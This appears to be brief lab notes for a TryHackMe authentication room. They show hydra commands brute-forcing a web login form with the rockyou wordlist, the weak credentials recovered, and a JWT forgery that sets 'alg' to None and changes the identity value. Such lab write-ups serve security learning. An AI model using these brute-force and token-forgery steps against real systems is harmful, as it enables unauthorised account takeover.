# TryHackMe Authenticate-2 Room
* https://tryhackme.com/room/authenticate

## Dictionnary Attack
* `hydra 10.10.104.21 http-form-post "/login:user=^USER^&password=^PASS^:Error" -l jack -P rockyou.txt -t 64 -s 8888 -VV`
    * `jack:12345678`
* `hydra 10.10.104.21 http-form-post "/login:user=^USER^&password=^PASS^:Error" -l mike -P rockyou.txt -t 10 -s 8888 -VV`
    * `mike:12345`

## JWT
* JWT tokens are base64 encoded
* They have 3 parts and the 3rd one can be encrypted or not
* You can intercept the response to the auth and edit the token
    * Change `alg` to `None`
    * Change the identity number
* `{"typ":"JWT","alg":"NONE"}`
* `{"exp":1586620929,"iat":1586620629,"nbf":1586620629,"identity":2}`
